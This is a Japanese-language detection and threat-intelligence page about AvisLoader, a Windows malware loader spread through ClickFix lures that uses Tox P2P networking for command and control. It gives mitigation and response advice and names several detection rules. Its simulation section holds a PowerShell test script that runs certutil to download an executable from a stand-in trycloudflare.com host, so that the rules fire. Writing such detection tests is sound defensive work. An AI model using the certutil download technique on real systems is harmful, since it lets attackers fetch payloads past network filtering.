AvisLoaderが堅牢なWindowsマルウェアローダーとして浮上
Detection stack
- AIDR
- Alert
- ETL
- Query
概要
AvisLoaderは、新たに確認されたWindowsマルウェアローダーで、Toxピアツーピア(P2P)メッセージングネットワークを使用してコマンド&コントロール(C2)通信を行います。この分散型アプローチにより、オペレーターは固定ドメインや集中型サーバーに依存せずに接続を維持し、コントローラを移動させることができます。マルウェアは通常、Cloudflareインフラストラクチャ上でホストされるClickFixのソーシャルエンジニアリング誘導を通じて配布されます。
調査
Varonis Threat Labsは、露出したステージングサーバー上でローダーをコマンドセンターや関連ツールと共に発見しました。調査では、ユーザーにCloudflare Quick Tunnelsを通じてペイロードを取得するコマンドを実行させるDocuSignをテーマにしたClickFixの誘導が特定されました。実行ファイルの分析により、ToxベースのC2通信、UACバイパス機能、および悪意のあるプロセスを隠すためのモジュールが見つかりました。
緩和策
組織は、端末やWindowsの実行ダイアログにコマンドを貼り付けるよう求めるドキュメント署名のプロンプトを認識して報告するようユーザーを訓練するべきです。セキュリティチームは、ウェブベースの誘導でのCloudflare WorkersやQuick Tunnelsの不審な使用を監視すべきです。予期しないピアツーピア(P2P)ネットワークトラフィックやデスクトップショートカットへの無許可の変更を検出することでもリスクを軽減できます。
対応策
AvisLoader活動が検出された場合、セキュリティチームは不審なドメイン訪問後に起動したコマンドシェルやスクリプト通訳のプロセス系譜を確認するべきです。修正されたショートカットをエンドポイントで検査し、 .backup ファイル、および VLCAssistant アーティファクトを確認します。ネットワークテレメトリを見直し、影響を受けたホストからの異常なToxプロトコルのトラフィックを検討するべきです。
攻撃フロー
この部分はまだ更新中です。
検出
名前に数字のみを含む不審な実行可能ファイル(コマンドライン経由)
不審なTrycloudflareドメイン通信(DNS経由)
不審なCurl実行試行 [MacOS](コマンドライン経由)
検出するためのIOCs(ハッシュSha256):AvisLoaderに出会う: 作戦終了を耐えるWindowsローダー
予期しないToxまたはピアツーピアトラフィックを検出 [Windowsネットワーク接続]
コマンドシェルおよびCloudflare Quick Tunnelを通じたリモートコード実行の検出 [Windowsプロセス作成]
シミュレーション実行
-
攻撃の流れとコマンド: 敵はワークステーションへの初期アクセスを獲得しました。持続性を維持し、2次的なモジュラーペイロードをダウンロードするために、攻撃者はCloudflare Quick Tunnelを使用して出口フィルタリングを回避します。攻撃者は
certutil.exe、ビルトインのWindowsユーティリティを使用して、次の場所からペイロードをダウンロードします:https://malicious-tunnel-id.trycloudflare.com/payload.exe。この方法が選ばれるのは、certutilが信頼されたバイナリであり、トラフィックが正当なCloudflareインフラストラクチャに向かっているように見えるため、基本的なネットワーク評価フィルターでフラグが立てられにくいからです。 -
回帰テストスクリプト:
# 検出ルールをトリガーするシミュレーションスクリプト。 # certutilを使用してtrycloudflare.comアドレスからのダウンロードを試みます。 $targetUrl = "https://fake-tunnel-id-1234.trycloudflare.com/malware.exe" Write-Host "[*] 敵の活動をシミュレート中:certutil経由で$targetUrlからダウンロード中..." # 以下のコマンドは 'selection_tunnel' および 'selection_tools' 条件をトリガーするよう設計されています。 certutil.exe -urlcache -split -f "$targetUrl" "$env:TEMPmalware.exe" if ($LASTEXITCODE -eq 0) { Write-Host "[+] シミュレーションコマンドは正常に実行されました。" } else { Write-Host "[-] コマンドが失敗しました(URLが存在しない場合は予想通りですが、テレメトリは依然として生成されるはずです)。" } -
クリーンアップコマンド:
# シミュレートされたペイロードとローカルアーティファクトを削除するクリーンアップスクリプト。 $tempFile = "$env:TEMPmalware.exe" if (Test-Path $tempFile) { Remove-Item -Path $tempFile -Force Write-Host "[+] $tempFile をクリーンアップしました" } else { Write-Host "[-] クリーンアップするアーティファクトが見つかりませんでした。" }